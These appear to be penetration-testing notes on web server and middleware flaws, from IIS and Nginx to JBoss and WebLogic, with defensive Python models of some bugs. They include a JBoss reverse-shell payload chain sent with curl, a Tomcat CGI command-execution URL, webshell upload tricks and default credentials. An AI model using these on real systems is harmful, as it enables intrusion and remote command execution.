Notes jotted down while reading documents others have published
-----
IIS
Parsing vulnerabilities
IIS 6
*.asp;.jpg is parsed as asp (everything after the ; is ignored)
Any file inside a directory named *.asp/ is parsed as asp
The .asa, .cdx and .cer extensions are parsed as asp as well
IIS 7
With PHP running under Fast-CGI, appending /.php to the URL of an uploaded file (test.jpg/.php) gets the file parsed as PHP (PHP's cgi.fix_pathinfo=1 falls back to test.jpg when test.jpg/.php does not exist)
PUT arbitrary file write
WebDAV enabled and write permission granted
IIS short filename (8.3 tilde) enumeration vulnerability
CVE-2017-7269
Windows Server 2003 R2 running IIS 6 with WebDAV enabled (buffer overflow in PROPFIND handling)
Apache
Parsing vulnerabilities
Unknown extension parsing vulnerability
1.php.xxx: Apache walks the extensions from right to left and skips any it does not recognise, so the file is handed to the PHP handler
AddHandler parsing vulnerability
If the config contains "AddHandler application/x-httpd-php .php", any filename with .php anywhere in it (e.g. a.php.jpg) is handled as PHP
HTTPD newline parsing vulnerability
CVE-2017-15715
Affects 2.4.0-2.4.29
The $ in a <FilesMatch "\.php$"> rule also matches just before a trailing newline, so upload a file named phpinfo.php followed by a newline (0x0a) and request /phpinfo.php%0a
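The three Apache behaviours above come down to how extensions and the FilesMatch regex are evaluated. The following model, added here as an illustration and not code from the original notes or from Apache, reproduces them in Python: the extension walk that ignores unknown suffixes, the AddHandler substring effect, and the trailing-newline match that `$` allows (Python's `$` behaves like PCRE's here; Python's `\Z` is the absolute end of string, which in PCRE is spelled `\z`). The handler and type tables are assumed minimal stand-ins for mod_mime's configuration, and `is_safe_upload_name` is an assumed allowlist check that rejects all three filenames.

```python
import re
from typing import Optional

# Assumed minimal stand-ins for mod_mime's AddHandler / AddType tables.
KNOWN_HANDLERS = {"php": "application/x-httpd-php", "phtml": "application/x-httpd-php"}
KNOWN_TYPES = {"jpg": "image/jpeg", "html": "text/html", "txt": "text/plain"}

# Upload allowlist used by the hardening check below (assumed policy).
ALLOWED_UPLOAD_EXT = {"jpg", "png", "gif", "txt"}


def apache_handler(filename: str) -> Optional[str]:
    """Model of the extension walk: every dot-separated suffix is examined and a
    suffix that is neither a known handler nor a known type is ignored, so
    1.php.xxx and a.php.jpg both end up with the PHP handler, while a.jpg has none."""
    handler = None
    for ext in filename.split(".")[1:]:
        if ext in KNOWN_HANDLERS:
            handler = KNOWN_HANDLERS[ext]
        # known types (jpg, html, ...) only set Content-Type; unknown ones are skipped
    return handler


# The rule shape affected by CVE-2017-15715: '$' matches before a final newline.
FILESMATCH_PHP = re.compile(r"\.php$")
# Python's \Z is the true end of string (PCRE equivalent: \z).
FILESMATCH_PHP_FIXED = re.compile(r"\.php\Z")


def filesmatch_php(filename: str, pattern: re.Pattern = FILESMATCH_PHP) -> bool:
    """Does a <FilesMatch> style rule classify this filename as PHP?"""
    return pattern.search(filename) is not None


def is_safe_upload_name(name: str) -> bool:
    """Allowlist check for an upload filename: printable ASCII only (rejects the
    trailing newline), exactly one extension, and that extension allowlisted
    (rejects a.php.jpg and 1.php.xxx regardless of the server's parsing rules)."""
    if not name or not name.isascii() or not name.isprintable():
        return False
    parts = name.split(".")
    return len(parts) == 2 and parts[0] != "" and parts[1].lower() in ALLOWED_UPLOAD_EXT


if __name__ == "__main__":
    for name in ["1.php.xxx", "a.php.jpg", "a.jpg", "phpinfo.php\n"]:
        print(repr(name), apache_handler(name), filesmatch_php(name),
              filesmatch_php(name, FILESMATCH_PHP_FIXED), is_safe_upload_name(name))
```

The takeaway for a reviewer: a `<FilesMatch "\.php$">` block is safer than `AddHandler` because a.php.jpg no longer matches, but it still matches "phpinfo.php\n" unless the anchor is the absolute end of string; the upload allowlist closes both holes independently of the server.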
Nginx
Nginx configuration (Fast-CGI) parsing vulnerability
info.jpg/1.php: with cgi.fix_pathinfo=1, PHP falls back to info.jpg when 1.php does not exist and executes it
Nginx null-byte arbitrary code execution vulnerability, versions 0.5.*, 0.6.*, 0.7-0.7.65, 0.8-0.8.37
Upload the webshell as a.jpg and request a.jpg%00.php
Nginx filename logic flaw (CVE-2013-4547), versions 0.8.41-1.4.3, 1.5.0-1.5.7
Upload the file with a trailing space ("a.jpg "), then request a.jpg followed by a space, a null byte and .php ("a.jpg \0.php")
Nginx configuration errors
Directory traversal
When the location used with alias is written without a trailing slash, nginx rewrites the URI by prefix replacement, so a request for /files../ maps to c:/WWW/home/../ and escapes the aliased directory
location /files {
    autoindex on;
    alias c:/WWW/home/;
}
With autoindex on, the directories reached this way are listed as well
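To see why the missing slash matters, the following Python model, added here as an illustration and not code from the original notes or from nginx, reproduces the prefix replacement that alias performs and checks whether the resulting path stays inside the aliased directory. It is an assumed simplification of nginx (prefix locations only, no regex locations, no try_files); the config values are the ones from the snippet above.

```python
from posixpath import normpath
from typing import Optional


def normalise_uri(uri: str) -> str:
    """Collapse . and .. segments before location matching, as nginx does with the
    request URI, keeping a trailing slash (assumed simplification)."""
    norm = normpath(uri)
    if uri.endswith("/") and not norm.endswith("/"):
        norm += "/"
    return norm


def nginx_alias_path(location: str, alias: str, uri: str) -> Optional[str]:
    """Model of alias: if the (normalised) URI starts with the location prefix,
    that prefix is replaced verbatim by the alias value. Returns None when the
    location does not match at all."""
    uri = normalise_uri(uri)
    if not uri.startswith(location):
        return None
    return alias + uri[len(location):]


def escapes_root(path: str, root: str) -> bool:
    """True when the mapped path, once . and .. are resolved, is outside root."""
    root = normpath(root)
    resolved = normpath(path)
    return resolved != root and not resolved.startswith(root + "/")


def alias_location_is_safe(location: str) -> bool:
    """Audit rule: a prefix location used with alias must end in '/', otherwise
    /files.. (and /files-anything) match the prefix and get rewritten."""
    return location.endswith("/")


if __name__ == "__main__":
    alias = "c:/WWW/home/"
    for location in ["/files", "/files/"]:
        for uri in ["/files/a.txt", "/files../", "/files/../secret"]:
            mapped = nginx_alias_path(location, alias, uri)
            verdict = "no match" if mapped is None else ("ESCAPES" if escapes_root(mapped, alias) else "ok")
            print(f"location {location!r:10} uri {uri!r:20} -> {mapped!r:26} {verdict}")
```

With `location /files` the request `/files../` is rewritten to `c:/WWW/home/../`; with `location /files/` it simply does not match, and `/files/../secret` is normalised to `/secret` before matching and never reaches the alias at all.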
Tomcat
Arbitrary file write CVE-2017-12615
With readonly=false set on the DefaultServlet in conf/web.xml, files can be written to the server with HTTP PUT
Tomcat remote code execution
CVE-2019-0232
9.0.0.M1-9.0.17, 8.5.0-8.5.39, 7.0.0-7.0.93
Windows only; requires the CGI servlet to be enabled in conf/web.xml with enableCmdLineArguments=true. Upload any .bat file, e.g. lxhsec.bat, into cgi-bin and pass the command via the query string:
http://127.0.0.1:8080/cgi-bin/lxhsec.bat?&C:/WINDOWS/system32/net+user
Tomcat weak password and manager getshell
Brute-force the Tomcat Manager App login, then deploy a WAR from the manager
JBoss default ports 8080, 9990
JBoss 5/6 deserialization vulnerability
CVE-2017-12149
If /invoker/readonly returns HTTP 500, the page exists and the target is a candidate
Tool: JavaDeserH2HC. Pick a gadget, ReverseShellCommonsCollectionsHashMap, compile it and generate the serialized payload:
Generate ReverseShellCommonsCollectionsHashMap.class
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
Generate ReverseShellCommonsCollectionsHashMap.ser (the argument is the ip:port where nc is listening)
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.31.232:6666
Send it:
curl http://192.168.31.205:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
JBoss JMXInvokerServlet deserialization vulnerability
/invoker/JMXInvokerServlet
JBoss EJBInvokerServlet deserialization vulnerability
/invoker/EJBInvokerServlet
JBoss <= 4.x JBossMQ JMS deserialization vulnerability CVE-2017-7504
/jbossmq-httpil/HTTPServerILServlet
Administration Console weak passwords
/admin-console/
JMX Console unauthorized access
/jmx-console/
WebLogic default port 7001
XMLDecoder deserialization vulnerability
CVE-2017-10271 & CVE-2017-3506
/wls-wsat/
wls9_async_response, wls-wsat deserialization vulnerability CVE-2019-2725
/_async/
/wls-wsat/
WLS Core Components deserialization vulnerability CVE-2018-2628
Triggered over the T3 protocol
WebLogic arbitrary file upload vulnerability CVE-2018-2894, versions 10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3
/ws_utc/config.do
Weblogic SSRF vulnerability CVE-2014-4210 10.0.2.0, 10.3.6.0
/uddiexplorer/SearchPublicRegistries.jsp
WebLogic weak password, getshell through the console
/console
GlassFish
Default ports: 8080 (web application port, i.e. the site content), 4848 (GlassFish admin console)
GlassFish Directory Traversal(CVE-2017-1000028)
Replace / in the path with its overlong UTF-8 encoding %c0%af to get past the path check and read sensitive files directly, e.g. under META-INF
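The trick above only works because some decoder accepts overlong UTF-8 forms that a strict decoder rejects. The following Python, added here as an illustration and not code from the original notes or from GlassFish, contrasts a lenient decoder (assumed model of such permissive behaviour, not GlassFish's actual code) with Python's strict one, and shows why a traversal check run on the raw, still-encoded path misses `%c0%ae%c0%ae%c0%af` even though it decodes to `../`. The sample path is constructed for the example.

```python
from urllib.parse import unquote_to_bytes


def lenient_utf8_decode(data: bytes) -> str:
    """Decode UTF-8 but, unlike a strict decoder, accept 2-byte overlong forms
    (lead bytes C0/C1), so %c0%af becomes '/' and %c0%ae becomes '.'.
    Assumed model of a permissive path decoder, not any real server's code."""
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            # 2-byte sequence decoded without the "must be >= 0x80" overlong check
            code_point = ((b & 0x1F) << 6) | (data[i + 1] & 0x3F)
            out.append(chr(code_point))
            i += 2
        else:
            raise ValueError(f"unsupported byte sequence at offset {i}")
    return "".join(out)


def decoded_request_path(raw_path: str, lenient: bool) -> str:
    """Percent-decode a request path, then UTF-8 decode it leniently or strictly."""
    raw = unquote_to_bytes(raw_path)
    return lenient_utf8_decode(raw) if lenient else raw.decode("utf-8")


def strict_rejects(raw_path: str) -> bool:
    """True when a strict UTF-8 decoder refuses the percent-decoded path."""
    try:
        decoded_request_path(raw_path, lenient=False)
        return False
    except UnicodeDecodeError:
        return True


def is_traversal(path: str) -> bool:
    """Naive traversal check: any '..' path segment."""
    return any(segment == ".." for segment in path.split("/"))


if __name__ == "__main__":
    sample = "/theme/META-INF/%c0%ae%c0%ae%c0%af"  # constructed example path
    print("raw path flagged:     ", is_traversal(sample))
    print("lenient decode:       ", decoded_request_path(sample, lenient=True))
    print("flagged after decode: ", is_traversal(decoded_request_path(sample, lenient=True)))
    print("strict decoder rejects:", strict_rejects(sample))
```

The practical rule this illustrates: decode fully (and reject anything a strict decoder refuses) before running any path or traversal check, never the other way round.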
GlassFish background Getshell
WebSphere
Java deserialization (CVE-2015-7450)
Reached through port 8880 (the SOAP connector)
Weak password, getshell through the console
Versions 6/7: entering admin in the console login with no password is enough to log in; other common credentials are websphere/websphere and system/manager